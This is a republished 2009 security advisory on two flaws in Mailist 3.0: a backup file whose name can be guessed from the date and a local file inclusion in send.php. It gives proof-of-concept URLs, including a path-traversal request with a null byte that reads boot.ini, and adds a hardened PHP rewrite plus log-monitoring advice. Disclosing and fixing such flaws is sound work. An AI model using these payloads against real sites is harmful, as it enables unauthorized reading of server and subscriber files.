Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities

2009.02.17
Credit: SirGod
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22

#############################################################################################
[+] Mailist 3.0 Insecure Backup/Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Homepage : http://ninjadesigns.co.uk/
[+] Download : http://ninjadesigns.co.uk/enter/mailist.zip

[+] Insecure Backup - Vulnerable code in admin.php
---------------------------------------------------------------------
if (isset($_GET['backup'])){
    echo "<br>";
    $file = 'maillist.php';
    $newfile = 'backups/'.date("jnY").'.txt';
    copy($file, $newfile);
    echo 'Successfully backed up. (backups/'.$newfile.')<br>';
    echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>';
}
----------------------------------------------------------------------

We can see how the backup is created :

$newfile = 'backups/'.date("jnY").'.txt';

The date() function is used.
n - Numeric representation of a month, without leading zeros
j - Day of the month without leading zeros
Y - A full numeric representation of a year, 4 digits

So we can guess the name of the database backup if we know when it was created.

Example : 622009.txt
6 - the day without leading 0
2 - the month without leading 0
2009 - the year

PoC : http://127.0.0.1/path/backups/622009.txt

[+] Local File Inclusion - Vulnerable code in send.php :
---------------------------------------------------------------------
if(isset($load)){
    include("outbox/".$load.".txt");
}
---------------------------------------------------------------------

Example : http://127.0.0.1/path/send.php?load=[Local File]%00

PoC : http://127.0.0.1/path/send.php?load=../../../../boot.ini%00
#############################################################################################
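A hardened rewrite of both snippets, added here as an example; it is not Mailist's or the vendor's code. It assumes the same outbox/ layout and a hypothetical backup directory outside the web root, and it reads the parameter from $_GET explicitly because the original send.php depends on register_globals to populate $load.

```php
<?php
// Added hardening example (not Mailist's own code). Assumes the advisory's
// outbox/ layout; $backupDir is a hypothetical directory the web server
// does not serve.

// 1. Local File Inclusion fix for send.php.
//    Allow only a short plain name (\A...\z so a trailing newline cannot
//    slip past), append ".txt" after validation, and confirm the resolved
//    path is still inside outbox/. Neither "../" nor a %00 byte can change
//    which file is read, and the file is returned as data, not include()d.
function load_outbox_message(string $outboxDir, ?string $load): ?string
{
    if ($load === null || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $load)) {
        return null;                      // reject anything but a plain name
    }
    $base = realpath($outboxDir);
    $path = realpath($outboxDir . '/' . $load . '.txt');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                      // missing, or escaped outbox/ via symlink
    }
    return file_get_contents($path);
}

// 2. Insecure backup fix for admin.php.
//    Write the copy outside the web root under an unguessable name, so the
//    date-only filename the advisory predicts no longer exists anywhere
//    a browser can reach it.
function backup_subscriber_list(string $source, string $backupDir): string
{
    $name = date('Y-m-d') . '-' . bin2hex(random_bytes(16)) . '.txt';
    $dest = rtrim($backupDir, '/') . '/' . $name;
    if (!copy($source, $dest)) {
        throw new RuntimeException('backup failed');
    }
    chmod($dest, 0600);                   // readable by the web user only
    return $name;                         // log server-side; do not echo the path
}

// send.php usage: parameter read from $_GET, unknown names answered with 404.
$body = load_outbox_message(__DIR__ . '/outbox', $_GET['load'] ?? null);
if ($body === null) {
    http_response_code(404);
    exit;
}
echo htmlspecialchars($body, ENT_QUOTES, 'UTF-8');
```

Requests that still hit send.php?load= with "../" or "%00", or that probe backups/ for date-named .txt files, are worth alerting on in the web server access log even after the fix, since they indicate someone working from this advisory.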


Copyright 2024, cxsecurity.com
